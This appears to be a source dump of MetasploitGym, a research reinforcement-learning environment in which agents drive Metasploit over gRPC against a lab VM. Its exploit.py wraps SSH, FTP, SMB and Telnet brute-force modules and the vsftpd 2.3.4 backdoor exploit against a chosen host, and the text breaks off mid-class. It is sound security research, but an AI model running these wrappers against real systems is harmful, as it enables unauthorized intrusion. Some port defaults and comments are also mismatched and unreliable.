├── LICENSE ├── README.md ├── examples ├── dqn_agent.py ├── keyboard_agent.py ├── models │ └── ScriptKiddie_low_lr_Episode_20.pt └── random_agent.py ├── metasploit_gym ├── __init__.py ├── action │ ├── __init__.py │ ├── action.py │ ├── exploit.py │ ├── privilege_escalation.py │ └── scan.py ├── host │ ├── network.py │ └── utils.py └── metasploit_env.py ├── pyproject.toml ├── requirements.txt └── tests ├── test_agent.py └── test_connection.py /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 phreakAI 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # MetasploitGym 2 | 3 | MetasploitGym is a [gym](https://github.com/openai/gym) environment designed to allow RL agents to interact with the[Metasploit Framework's](https://github.com/rapid7/metasploit-framework) gRPC service to interact with networks and singular machines. 4 | 5 | **Note**: MetasploitGym is research code and under active development. Breaking changes are not just likely, but necessary to get the API where it needs to be. In fact, this will all probably be completely rewritten. 6 | 7 | `examples` features stubs for a DeepQNetwork, Random, and Keyboard driven agents. 8 | 9 | `tests` Need to be filled out. Currently mostly makes sure the gRPC service didn't break. 10 | 11 | 12 | ### Requirements 13 | 14 | This software communicate with metasploit over g-RPC. To do this, you're going to need a g-RPC service running. Personally I've got a dockerfile to handle this. I've got a dockerfile set up how I like it [here](https://github.com/SJCaldwell/dockerfile-msf) based on [phocean's](https://github.com/phocean/dockerfile-msf) excellent work. 15 | 16 | Once you start up the dockerfile, run the following commands 17 | 18 | `./msfconsole` 19 | `load msgrpc Pass=[your_pass] ServerPort=[your_port] ServerHost=0.0.0.0 SSL=true` 20 | 21 | I've found when running the msfrpcd service I cannot maintain a database connection, I'll work to determine why that is later. 22 | 23 | It's easier to test database changes directly through msfconsole directly though, so it's not the end of the world. 24 | 25 | Metasploit gym will also assume you have `METASPLOIT_PASSWORD` `METASPLOIT_PORT` and `METASPLOIT_HOST` as environmental variables it can use to connect to msgrpc. This will correspond to `[your_pass]`, `[your_port]`, and the hostname of your grpc service above. 26 | 27 | ### API 28 | 29 | MetasploitGym, while training, will undergo several episodes. It will do this by running its `env.reset()` function. In order to keep this general, it will require *the client* to write code that will reset its own environment. A VirtualBox sample for resetting a singular machine called `metasploitable` is included below. 30 | 31 | 32 | ```python 33 | import pyvbox 34 | import virtualbox 35 | 36 | def environment_reset(): 37 | start = time.time() 38 | name = "gym_episode_start" 39 | vb = virtualbox.VirtualBox() 40 | session = virtualbox.Session() 41 | try: 42 | vm = vb.find_machine("metasploitable") 43 | snap = vm.find_snapshot(name) 44 | vm.create_session(session=session) 45 | except Exception as e: 46 | print(str(e)) 47 | return False 48 | shutting_down = session.console.power_down() 49 | while shutting_down.operation_percent < 100: 50 | time.sleep(0.5) 51 | restoring = session.machine.restore_snapshot(snap) 52 | while restoring.operation_percent < 100: 53 | time.sleep(0.5) 54 | if restoring.completed == 1: 55 | print(f"Restore machine in {str(time.time() - start)} sec") 56 | vm = vb.find_machine("metasploitable") 57 | session = virtualbox.Session() 58 | vm.launch_vm_process(session, "gui", []) 59 | ``` 60 | However that code is written, as long as the function does not end until the environment is in a clean state, then you're ready to use the metasploit gym. 61 | 62 | ```python 63 | import metasploit_gym 64 | 65 | env = metasploit_gym.metasploit_env.MetasploitNetworkEnv( 66 | reset_function=environment_reset, 67 | initial_target=target_host 68 | ) 69 | ``` 70 | It will default to having the state space for 1 subnet and 1 host. This can be changed with the `max_subnets`, `max_hosts_per_subnet` arguments. You can define an initial target as well, which will be where the agent starts. 71 | 72 | ### Release Notes 73 | MetasploitGym is under active development, and release notes will be stored in the [releases page](https://github.com/phreakai/metasploitgym/releases) on GitHub. 74 | -------------------------------------------------------------------------------- /examples/dqn_agent.py: -------------------------------------------------------------------------------- 1 | """Example 2 | """ 3 | import random 4 | import numpy as np 5 | import metasploit_gym 6 | import virtualbox 7 | import time 8 | 9 | import torch 10 | import torch.nn as nn 11 | import torch.optim as optim 12 | import torch.nn.functional as F 13 | from torch.utils.tensorboard import SummaryWriter 14 | 15 | 16 | class ReplayMemory: 17 | def __init__(self, capacity, s_dims, device="cpu"): 18 | self.capacity = capacity 19 | self.device = device 20 | self.s_buf = np.zeros((capacity, *s_dims), dtype=np.float32) 21 | self.a_buf = np.zeros((capacity, 1), dtype=np.int64) 22 | self.next_s_buf = np.zeros((capacity, *s_dims), dtype=np.float32) 23 | self.r_buf = np.zeros(capacity, dtype=np.float32) 24 | self.done_buf = np.zeros(capacity, dtype=np.float32) 25 | self.ptr, self.size = 0, 0 26 | 27 | def store(self, s, a, next_s, r, done): 28 | self.s_buf[self.ptr] = s 29 | self.a_buf[self.ptr] = a 30 | self.next_s_buf[self.ptr] = next_s 31 | self.r_buf[self.ptr] = r 32 | self.done_buf[self.ptr] = done 33 | self.ptr = (self.ptr + 1) % self.capacity 34 | self.size = min(self.size + 1, self.capacity) 35 | 36 | def sample_batch(self, batch_size): 37 | sample_idxs = np.random.choice(self.size, batch_size) 38 | batch = [ 39 | self.s_buf[sample_idxs], 40 | self.a_buf[sample_idxs], 41 | self.next_s_buf[sample_idxs], 42 | self.r_buf[sample_idxs], 43 | self.done_buf[sample_idxs], 44 | ] 45 | return [torch.from_numpy(buf).to(self.device) for buf in batch] 46 | 47 | 48 | class DQN(nn.Module): 49 | def __init__(self, input_dim, layers, num_actions): 50 | super().__init__() 51 | self.layers = nn.ModuleList([nn.Linear(input_dim[0] * input_dim[1], layers[0])]) 52 | for l in range(1, len(layers)): 53 | self.layers.append(nn.Linear(layers[l - 1], layers[l])) 54 | self.out = nn.Linear(layers[-1], num_actions) 55 | 56 | def forward(self, x): 57 | x = torch.flatten(x, start_dim=1) 58 | for layer in self.layers: 59 | x = F.relu(layer(x)) 60 | x = self.out(x) 61 | return x 62 | 63 | def save_model(self, file_path): 64 | torch.save(self.state_dict(), file_path) 65 | 66 | def load_model(self, file_path): 67 | self.load_state_dict(torch.load(file_path)) 68 | 69 | def get_action(self, x): 70 | x = x.unsqueeze(0) # add batch dimension 71 | with torch.no_grad(): 72 | if len(x.shape) == 1: 73 | x = x.view(1, -1) 74 | return self.forward(x).max(1)[1] 75 | 76 | 77 | class DQNAgent: 78 | """A simple Deep Q-Network Agent""" 79 | 80 | def __init__( 81 | self, 82 | env, 83 | seed=42, 84 | lr=0.0001, 85 | training_steps=100, 86 | batch_size=32, 87 | replay_size=1000, 88 | final_epsilon=0.05, 89 | exploration_steps=50, 90 | gamma=0.99, 91 | hidden_sizes=[64, 64], 92 | target_update_freq=10, 93 | verbose=True, 94 | **kwargs, 95 | ): 96 | self.verbose = True 97 | self.seed = seed 98 | np.random.seed(self.seed) 99 | 100 | self.env = env 101 | 102 | self.num_actions = self.env.action_space.n 103 | self.obs_dim = self.env.observation_space.shape 104 | 105 | self.logger = SummaryWriter() 106 | 107 | self.lr = lr 108 | self.exploration_steps = exploration_steps 109 | self.final_epsilon = final_epsilon 110 | self.epsilon_schedule = np.linspace( 111 | 1.0, self.final_epsilon, self.exploration_steps 112 | ) 113 | 114 | self.batch_size = batch_size 115 | self.discount = gamma 116 | self.training_steps = training_steps 117 | self.steps_done = 0 118 | 119 | # Neural networks related attributes 120 | self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu") 121 | self.dqn = DQN(self.obs_dim, hidden_sizes, self.num_actions).to(self.device) 122 | 123 | self.target_dqn = DQN(self.obs_dim, hidden_sizes, self.num_actions).to( 124 | self.device 125 | ) 126 | 127 | self.target_update_freq = target_update_freq 128 | 129 | self.optimizer = optim.Adam(self.dqn.parameters(), lr=self.lr) 130 | self.loss_fn = nn.SmoothL1Loss() 131 | 132 | # replay setup 133 | self.replay = ReplayMemory(replay_size, self.obs_dim, self.device) 134 | 135 | def save(self, file_path): 136 | self.dqn.save_model(file_path) 137 | 138 | def load(self, file_path): 139 | self.dqn.load_model(file_path) 140 | 141 | def get_epsilon(self): 142 | if self.steps_done < self.exploration_steps: 143 | return self.epsilon_schedule[self.steps_done] 144 | return self.final_epsilon 145 | 146 | def get_egreedy_action(self, o, epsilon): 147 | if random.random() > epsilon: 148 | o = torch.from_numpy(o).float().to(self.device) 149 | return self.dqn.get_action(o).cpu().item() 150 | return random.randint(0, self.num_actions - 1) 151 | 152 | def optimize(self): 153 | batch = self.replay.sample_batch(self.batch_size) 154 | s_batch, a_batch, next_s_batch, r_batch, d_batch = batch 155 | q_vals_raw = self.dqn(s_batch) 156 | q_vals = q_vals_raw.gather(1, a_batch) 157 | 158 | with torch.no_grad(): 159 | target_q_val_raw = self.target_dqn(next_s_batch) 160 | target_q_val = target_q_val_raw.max(1)[0] 161 | target = r_batch + self.discount * (1 - d_batch) * target_q_val 162 | 163 | # calculate loss 164 | q_vals = q_vals.view(-1) 165 | 166 | loss = self.loss_fn(q_vals, target) 167 | 168 | # optimize the model 169 | self.optimizer.zero_grad() 170 | loss.backward() 171 | self.optimizer.step() 172 | 173 | if self.steps_done % self.target_update_freq == 0: 174 | self.target_dqn.load_state_dict(self.dqn.state_dict()) 175 | 176 | q_vals_max = q_vals_raw.max(1)[0] 177 | mean_v = q_vals_max.mean().item() 178 | return loss.item(), mean_v 179 | 180 | def train(self): 181 | num_episodes = 0 182 | training_steps_remaining = self.training_steps 183 | 184 | while self.steps_done < self.training_steps: 185 | ep_results = self.run_train_episode(10) 186 | ep_return, ep_steps, goal = ep_results 187 | num_episodes += 1 188 | training_steps_remaining -= ep_steps 189 | 190 | self.logger.add_scalar("episode", num_episodes, self.steps_done) 191 | self.logger.add_scalar("epsilon", self.get_epsilon(), self.steps_done) 192 | self.logger.add_scalar("episode_return", ep_return, self.steps_done) 193 | self.logger.add_scalar("episode_goal_reached", int(goal), self.steps_done) 194 | 195 | if num_episodes % 10 == 0 and self.verbose: 196 | print(f"\nEpisode {num_episodes}:") 197 | print(f"\tsteps done = {self.steps_done} /" f"{self.training_steps}") 198 | print(f"\treturn = {ep_return}") 199 | print(f"\tgoal = {goal}") 200 | self.dqn.save_model( 201 | f"models/ScriptKiddie_low_lr_Episode_{num_episodes}.pt" 202 | ) 203 | self.logger.close() 204 | if self.verbose: 205 | print("Training complete") 206 | print(f"\nEpisode {num_episodes}:") 207 | print(f"\tsteps done = {self.steps_done} / {self.training_steps}") 208 | print(f"\treturn = {ep_return}") 209 | print(f"\tgoal = {goal}") 210 | 211 | def run_train_episode(self, step_limit): 212 | o = self.env.reset() 213 | done = False 214 | 215 | steps = 0 216 | episode_return = 0 217 | print("STARTING EPISODE") 218 | print(f"Step limit = {step_limit}") 219 | 220 | while not done and steps < step_limit: 221 | a = self.get_egreedy_action(o, self.get_epsilon()) 222 | action = env.action_space.get_action(a) 223 | next_o, r, done, _ = self.env.step(action) 224 | print(f"ACTION REWARD {r}") 225 | self.replay.store(o, a, next_o, r, done) 226 | self.steps_done += 1 227 | loss, mean_v = self.optimize() 228 | self.logger.add_scalar("loss", loss, self.steps_done) 229 | self.logger.add_scalar("mean_v", mean_v, self.steps_done) 230 | 231 | o = next_o 232 | episode_return += r 233 | steps += 1 234 | print("ENDING EPISODE") 235 | return episode_return, steps, self.env.goal_reached() 236 | 237 | def run_eval_episode( 238 | self, env=None, render=False, eval_epsilon=0.05, render_mode="readable" 239 | ): 240 | if env is None: 241 | env = self.env 242 | o = env.reset() 243 | done = False 244 | 245 | steps = 0 246 | episode_return = 0 247 | 248 | line_break = "=" * 60 249 | if render: 250 | print("\n" + line_break) 251 | print(f"Running EVALUATION using epsilon = {eval_epsilon:.4f}") 252 | print(line_break) 253 | env.render(render_mode) 254 | input("Initial state. Press enter to continue..") 255 | 256 | while not done: 257 | a = self.get_egreedy_action(o, eval_epsilon) 258 | action = env.action_space.get_action(a) 259 | next_o, r, done, _ = env.step(action) 260 | o = next_o 261 | episode_return += r 262 | steps += 1 263 | if render: 264 | print("\n" + line_break) 265 | print(f"Steps {steps}") 266 | print(line_break) 267 | print(f"Action performed = {env.action_space.get_action(a)}") 268 | env.render(render_mode) 269 | print(f"Reward = {r}") 270 | print(f"Done = {done}") 271 | input("Press enter to continue.") 272 | 273 | if done: 274 | print("\n" + line_break) 275 | print("EPISODE FINISHED") 276 | print(line_break) 277 | print(f"Goal reached = {env.goal_reached()}") 278 | print(f"Total steps = {steps}") 279 | print(f"Total reward = {episode_return}") 280 | return episode_return, steps, env.goal_reached() 281 | 282 | 283 | if __name__ == "__main__": 284 | import argparse 285 | 286 | parser = argparse.ArgumentParser() 287 | parser.add_argument( 288 | "--render_eval", action="store_true", help="Renders final policy" 289 | ) 290 | parser.add_argument( 291 | "--hidden_sizes", 292 | type=int, 293 | nargs="*", 294 | default=[64, 64], 295 | help="(default=[64. 64])", 296 | ) 297 | parser.add_argument( 298 | "--lr", type=float, default=0.001, help="Learning rate (default=0.001)" 299 | ) 300 | parser.add_argument( 301 | "-t", 302 | "--training_steps", 303 | type=int, 304 | default=200, 305 | help="training steps (default=20000)", 306 | ) 307 | parser.add_argument("--batch_size", type=int, default=32, help="(default=32)") 308 | parser.add_argument( 309 | "--target_update_freq", type=int, default=1000, help="(default=1000)" 310 | ) 311 | parser.add_argument("--seed", type=int, default=0, help="(default=0)") 312 | parser.add_argument("--replay_size", type=int, default=1000, help="(default=1000)") 313 | parser.add_argument( 314 | "--final_epsilon", type=float, default=0.05, help="(default=0.05)" 315 | ) 316 | parser.add_argument("--init_epsilon", type=float, default=1.0, help="(default=1.0)") 317 | parser.add_argument( 318 | "--exploration_steps", type=int, default=10000, help="(default=10000)" 319 | ) 320 | parser.add_argument("--gamma", type=float, default=0.99, help="(default=0.99)") 321 | parser.add_argument("--quite", action="store_false", help="Run in Quite mode") 322 | args = parser.parse_args() 323 | 324 | def environment_reset(): 325 | start = time.time() 326 | name = "gym_episode_start" 327 | vb = virtualbox.VirtualBox() 328 | session = virtualbox.Session() 329 | try: 330 | vm = vb.find_machine("metasploitable") 331 | snap = vm.find_snapshot(name) 332 | vm.create_session(session=session) 333 | except virtualbox.library.VBoxError as e: 334 | print(e.msg) 335 | return True 336 | except Exception as e: 337 | print(str(e)) 338 | return True 339 | shutting_down = session.console.power_down() 340 | while shutting_down.operation_percent < 100: 341 | time.sleep(0.5) 342 | restoring = session.machine.restore_snapshot(snap) 343 | while restoring.operation_percent < 100: 344 | time.sleep(0.5) 345 | vm = vb.find_machine("metasploitable") 346 | session = virtualbox.Session() 347 | proc = vm.launch_vm_process(session, "gui", []) 348 | proc.wait_for_completion(timeout=-1) 349 | return True 350 | 351 | env = metasploit_gym.metasploit_env.MetasploitNetworkEnv( 352 | reset_function=environment_reset 353 | ) 354 | dqn_agent = DQNAgent(env, verbose=args.quite, **vars(args)) 355 | dqn_agent.train() 356 | dqn_agent.run_eval_episode(render=args.render_eval) 357 | -------------------------------------------------------------------------------- /examples/keyboard_agent.py: -------------------------------------------------------------------------------- 1 | """An agent for interacting with the MetasploitGym environment using the keyboard. 2 | 3 | To see available arguments, run python keyboard_agent --help 4 | """ 5 | import numpy as np 6 | import metasploit_gym 7 | 8 | LINE_BREAK = "-" * 60 9 | LINE_BREAK_2 = "=" * 60 10 | 11 | 12 | def choose_host(env): 13 | host_list = [host for host in env.host_dict.keys()] 14 | while True: 15 | try: 16 | print("KNOWN HOSTS:") 17 | for i in range(len(host_list)): 18 | print(f"[{str(i)}] IP: {host_list[i]}") 19 | idx = int(input("Please enter a number:")) 20 | return host_list[idx] 21 | except Exception: 22 | print("Invalid choice. Please select one of the numbered options") 23 | 24 | 25 | def choose_action_for_host(env, ip_address): 26 | target_actions = [] 27 | target = env.host_dict[ip_address] 28 | for action in env.action_space.actions: 29 | if action.target == target: 30 | target_actions.append(action) 31 | while True: 32 | try: 33 | print("ACTIONS ON HOST") 34 | for i in range(len(target_actions)): 35 | print(f"[{str(i)}] : action {target_actions[i].name}") 36 | idx = int(input("Please enter a number:")) 37 | return target_actions[idx] 38 | except Exception: 39 | print("Invalid choice. Please select one of the numbered options") 40 | 41 | 42 | def run_keyboard_agent(env, step_limit=2, verbose=True): 43 | print(LINE_BREAK) 44 | print("STARTING EPISODE:") 45 | 46 | env.reset() 47 | total_reward = 0 48 | done = False 49 | t = 0 50 | 51 | while not done and t < step_limit: 52 | ip_address = choose_host(env) 53 | a = choose_action_for_host(env, ip_address) 54 | _, r, done, _ = env.step(a) 55 | print(r) 56 | total_reward += r 57 | if (t + 1) % 20 == 0 and verbose: 58 | print(f"t: {t}: reward: {total_reward}") 59 | t += 1 60 | 61 | if done and verbose: 62 | print(LINE_BREAK) 63 | print("EPISODE COMPLETE") 64 | print(LINE_BREAK) 65 | print(f"Total steps = {t}") 66 | print(f"Total reward = {total_reward}") 67 | return t, total_reward, done 68 | 69 | 70 | if __name__ == "__main__": 71 | import argparse 72 | 73 | parser = argparse.ArgumentParser() 74 | parser.add_argument("-s", "--seed", type=int, default=0, help="random seed") 75 | parser.add_argument( 76 | "-r", 77 | "--runs", 78 | type=int, 79 | default=1, 80 | help="Number of random runs to perform (default=1", 81 | ) 82 | args = parser.parse_args() 83 | run_steps = [] 84 | run_rewards = [] 85 | run_goals = 0 86 | 87 | def environment_reset(): 88 | raise NotImplemented("Reset your network with this function") 89 | 90 | env = metasploit_gym.metasploit_env.MetasploitNetworkEnv( 91 | reset_function=environment_reset 92 | ) 93 | for i in range(args.runs): 94 | steps, reward, done = run_keyboard_agent(env, step_limit=2, verbose=True) 95 | run_steps.append(steps) 96 | run_rewards.append(reward) 97 | run_steps = np.array(run_steps) 98 | run_rewards = np.array(run_rewards) 99 | 100 | print(f"Mean steps = {run_steps.mean():.2f} +/- {run_steps.std():.2f}") 101 | print(f"Mean rewards = {run_rewards.mean():.2f} " f"+/- {run_rewards.std():.2f}") 102 | -------------------------------------------------------------------------------- /examples/models/ScriptKiddie_low_lr_Episode_20.pt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phreakAI/metasploit-gym/128b977ccebbbb026784cba0ecd82182fdfb0cdb/examples/models/ScriptKiddie_low_lr_Episode_20.pt -------------------------------------------------------------------------------- /examples/random_agent.py: -------------------------------------------------------------------------------- 1 | import numpy as np 2 | import metasploit_gym 3 | import time 4 | import time 5 | 6 | LINE_BREAK = "-" * 60 7 | 8 | 9 | def run_random_agent(env, step_limit=10, verbose=True): 10 | if verbose: 11 | print(LINE_BREAK) 12 | print("STARTING EPISODE") 13 | print(LINE_BREAK) 14 | # reset environment from last episode 15 | env.reset() 16 | total_reward = 0 17 | done = False 18 | t = 0 19 | start = time.time() 20 | action_count = 0 21 | while not done and t < step_limit: 22 | a = env.action_space.sample() 23 | a = env.action_space.get_action(a) 24 | print(a) 25 | _, r, done, _ = env.step(a) 26 | if done: 27 | print("DONE AT") 28 | print(t) 29 | return t, total_reward, env.goal_reached() 30 | if action_count == 256: 31 | stop = time.time() 32 | print("To collect 256 time steps requires: ") 33 | print(stop - start) 34 | total_reward += r 35 | if (t + 1) % 20 == 0 and verbose: 36 | print(f"t: {t}: reward:{total_reward}") 37 | t += 1 38 | 39 | if done and verbose: 40 | print(LINE_BREAK) 41 | print("EPISODE COMPLETE") 42 | print(LINE_BREAK) 43 | print(f"Total steps = {t}") 44 | print(f"Total reward = {total_reward}") 45 | elif verbose: 46 | print(LINE_BREAK) 47 | print("STEP LIMIT REACHED") 48 | print(LINE_BREAK) 49 | return t, total_reward, env.goal_reached() 50 | 51 | 52 | if __name__ == "__main__": 53 | import argparse 54 | 55 | parser = argparse.ArgumentParser() 56 | parser.add_argument("-s", "--seed", type=int, default=0, help="random seed") 57 | parser.add_argument( 58 | "-r", 59 | "--runs", 60 | type=int, 61 | default=20, 62 | help="Number of random runs to perform (default=1", 63 | ) 64 | args = parser.parse_args() 65 | run_steps = [] 66 | run_rewards = [] 67 | run_goals = 0 68 | 69 | def environment_reset(): 70 | raise NotImplementedError("Reset your environment with this function") 71 | 72 | env = metasploit_gym.metasploit_env.MetasploitNetworkEnv( 73 | reset_function=environment_reset 74 | ) 75 | for i in range(args.runs): 76 | steps, reward, done = run_random_agent(env, step_limit=5, verbose=True) 77 | run_steps.append(steps) 78 | run_rewards.append(reward) 79 | if done: 80 | run_goals += 1 81 | run_steps = np.array(run_steps) 82 | run_rewards = np.array(run_rewards) 83 | 84 | print(f"Mean steps = {run_steps.mean():.2f} +/- {run_steps.std():.2f}") 85 | print(f"Mean rewards = {run_rewards.mean():.2f} " f"+/- {run_rewards.std():.2f}") 86 | print(run_goals) 87 | print("out of") 88 | print(args.runs) 89 | -------------------------------------------------------------------------------- /metasploit_gym/__init__.py: -------------------------------------------------------------------------------- 1 | from gym.envs.registration import register 2 | 3 | from .metasploit_env import MetasploitNetworkEnv, MetasploitSimulatorEnv 4 | 5 | environments = [["MetasploitNetworkEnv", "v0"], ["MetasploitSimulatorEnv", "v0"]] 6 | 7 | 8 | for environment in environments: 9 | register( 10 | id=f"{environment[0]}-{environment[1]}", 11 | entry_point=f"metasploit_gym:{environment}", 12 | nondeterministic=True, 13 | ) 14 | -------------------------------------------------------------------------------- /metasploit_gym/action/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phreakAI/metasploit-gym/128b977ccebbbb026784cba0ecd82182fdfb0cdb/metasploit_gym/action/__init__.py -------------------------------------------------------------------------------- /metasploit_gym/action/action.py: -------------------------------------------------------------------------------- 1 | """Action related classes for the MetasploitGym environment. 2 | 3 | This module contains the different action classes that are used 4 | to represent a subset of the abilities available to the metasploit API, along 5 | with the different ActionSpace and ActionResult classes. 6 | """ 7 | 8 | class Action(object): 9 | """The base abstraction class for the environment. 10 | 11 | There are multiple types of actions. We consider exploits, scans, privilege escalations. 12 | """ 13 | 14 | def __init__(self, name, target, req_access, req_os, req_version, **kwargs): 15 | """ 16 | Args: 17 | name (str): name of action 18 | target (int, int): space of target (subnet, host) 19 | req_access (AccessLevel), optional: required access level to perform the action 20 | req_os (OperatingSystem), optional: required OS to perform the action 21 | req_version (RequiredVersion), optional: required version number 22 | """ 23 | self.name = name 24 | self.target = target 25 | self.req_access = req_access 26 | self.req_os = (req_os,) 27 | self.req_version = req_version 28 | 29 | def is_exploit(self): 30 | """Check if action is exploit""" 31 | return isinstance(self, Exploit) 32 | 33 | def is_scan(self): 34 | """Check if action is scan""" 35 | return isinstance(self, Scan) 36 | 37 | def is_privilege_escalation(self): 38 | """Check if action is privilege escalation""" 39 | return isinstance(self, PrivilegeEscalation) 40 | 41 | def is_no_op(self): 42 | """Check if operation is none operation""" 43 | return isinstance(self, NoOp) 44 | 45 | def is_remote(self): 46 | """Check if action is remote. An action 47 | is remote if it's not being run from a process on the local 48 | machine""" 49 | return isinstance(self, (Scan, Exploit)) 50 | 51 | def execute(self): 52 | """ 53 | Execute the action 54 | """ 55 | return NotImplementedError 56 | 57 | 58 | class Exploit(Action): 59 | def __init__(self): 60 | super().__init__( 61 | self.name, self.target, self.req_access, self.req_os, self.req_version 62 | ) 63 | 64 | 65 | class Scan(Action): 66 | def __init__(self): 67 | raise NotImplementedError 68 | 69 | 70 | class PrivilegeEscalation(Action): 71 | def __init__(self): 72 | raise NotImplementedError 73 | 74 | 75 | class NoOp(Action): 76 | def __init__(self): 77 | raise NotImplementedError 78 | -------------------------------------------------------------------------------- /metasploit_gym/action/exploit.py: -------------------------------------------------------------------------------- 1 | """Exploits currently supported 2 | Straightforward to add more following the basic model presented here 3 | """ 4 | from .action import Exploit 5 | import time 6 | 7 | 8 | def wait_for_job_completion(job_info, client): 9 | if job_info is not None: 10 | if "error" in job_info: 11 | return 12 | job_is_running = True 13 | while job_is_running: 14 | job_id = job_info["uuid"] 15 | results = client.jobs.info_by_uuid(job_id) 16 | if "error" in results: 17 | return 18 | if results["status"] == "completed": 19 | job_is_running = False 20 | else: 21 | time.sleep(1) 22 | 23 | 24 | class SSH_Bruteforce(Exploit): 25 | """port 22 bruteforce 26 | https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssh/ssh_login.rb 27 | """ 28 | 29 | def __init__(self, target=(0, 0)): 30 | self.name = "SSH_Bruteforce" 31 | self.service = "ssh" 32 | self.target = target 33 | self.req_access = None 34 | self.req_os = None 35 | self.req_version = None 36 | super(Exploit, self).__init__( 37 | self.name, self.target, self.req_access, self.req_os, self.req_version 38 | ) 39 | 40 | def execute(self, client, host, port=22): 41 | """ 42 | :param client: metasploit client object 43 | :param host: string representing IP of the target 44 | :param port: default port 22 45 | :return: 46 | """ 47 | exploit = client.modules.use("auxiliary", "scanner/ssh/ssh_login") 48 | exploit["RHOSTS"] = host 49 | exploit["RPORT"] = port 50 | # TODO: This should be detected based on metasploit rpc server 51 | exploit["USERPASS_FILE"] = "/usr/share/metasploit-framework/data/wordlists" 52 | job_info = exploit.execute() 53 | wait_for_job_completion(job_info, client) 54 | 55 | 56 | class FTP_Bruteforce(Exploit): 57 | """port 23 bruteforce 58 | https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/ftp_login.rb 59 | """ 60 | 61 | def __init__(self, target=(0, 0)): 62 | self.name = "FTP_Bruteforce" 63 | self.service = "ftp" 64 | self.target = target 65 | self.req_access = None 66 | self.req_os = None 67 | self.req_version = None 68 | super(Exploit, self).__init__( 69 | self.name, self.target, self.req_access, self.req_os, self.req_version 70 | ) 71 | 72 | def execute(self, client, host, port=23): 73 | """ 74 | :param client: metasploit client object 75 | :param host: string representing IP of the target 76 | :param port: default port 23 77 | :return: 78 | """ 79 | exploit = client.modules.use("auxiliary", "scanner/ftp/ftp_login") 80 | exploit["RHOSTS"] = host 81 | exploit["RPORT"] = port 82 | # TODO: This should be detected based on metasploit rpc server 83 | exploit["USERPASS_FILE"] = "/usr/share/metasploit-framework/data/wordlists" 84 | job_info = exploit.execute() 85 | wait_for_job_completion(job_info, client) 86 | 87 | 88 | class SMB_Bruteforce(Exploit): 89 | """ 90 | port 445 bruteforce 91 | https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_login.rb 92 | """ 93 | 94 | def __init__(self, target=(0, 0)): 95 | self.name = "SMB_Bruteforce" 96 | self.service = "Microsoft-DS" 97 | self.target = target 98 | self.req_access = None 99 | self.req_os = None 100 | self.req_version = None 101 | super(Exploit, self).__init__( 102 | self.name, self.target, self.req_access, self.req_os, self.req_version 103 | ) 104 | 105 | def execute(self, client, host, port=445): 106 | """ 107 | :param client: metasploit client object 108 | :param host: string representing IP of the target 109 | :param port: default port 445 110 | :return: 111 | """ 112 | exploit = client.modules.use("auxiliary", "scanner/smb/smb_login") 113 | exploit["RHOSTS"] = host 114 | exploit["RPORT"] = port 115 | exploit[ 116 | "USERPASS_FILE" 117 | ] = "/usr/share/metasploit-framework/data/wordlists" # TODO: This should be detected based on metasploit rpc server 118 | job_info = exploit.execute() 119 | wait_for_job_completion(job_info, client) 120 | 121 | 122 | class Telnet_Bruteforce(Exploit): 123 | """port 23 bruteforce 124 | https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/telnet/telnet_login.rb 125 | """ 126 | 127 | def __init__(self, target=(0, 0)): 128 | self.name = "Telnet_Bruteforce" 129 | self.service = "telnet" 130 | self.target = target 131 | self.req_access = None 132 | self.req_os = None 133 | self.req_version = None 134 | super(Exploit, self).__init__( 135 | self.name, self.target, self.req_access, self.req_os, self.req_version 136 | ) 137 | 138 | def execute(self, client, host, port=445): 139 | """ 140 | :param client: metasploit client object 141 | :param host: string representing IP of the target 142 | :param port: default port 445 143 | :return: 144 | """ 145 | exploit = client.modules.use("auxiliary", "scanner/telnet/telnet_login") 146 | exploit["RHOSTS"] = host 147 | exploit["RPORT"] = port 148 | exploit[ 149 | "USERPASS_FILE" 150 | ] = "/usr/share/metasploit-framework/data/wordlists" # TODO: This should be detected based on metasploit rpc server 151 | job_info = exploit.execute() 152 | wait_for_job_completion(job_info, client) 153 | 154 | 155 | class VSFTPD(Exploit): 156 | """use exploit/unix/ftp/vsftpd_234_backdoor 157 | https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb 158 | 159 | Args: 160 | Exploit ([type]): vsftpd 2.3.4 port 21 161 | 162 | Raises: 163 | NotImplementedError: [description] 164 | """ 165 | 166 | def __init__(self, target=(0, 0)): 167 | self.name = "VSFTPD" 168 | self.service = "ftp" 169 | self.target = target 170 | self.req_access = None 171 | self.req_os = "unix" 172 | self.req_version = None 173 | super(Exploit, self).__init__( 174 | self.name, self.target, self.req_access, self.req_os, self.req_version 175 | ) 176 | 177 | def execute(self, client, host, port=21): 178 | """ 179 | :param client: metasploit client object 180 | :param host: string representing IP of the target 181 | :param port: default port 21 182 | :return: 183 | """ 184 | exploit = client.modules.use("exploit", "unix/ftp/vsftpd_234_backdoor") 185 | 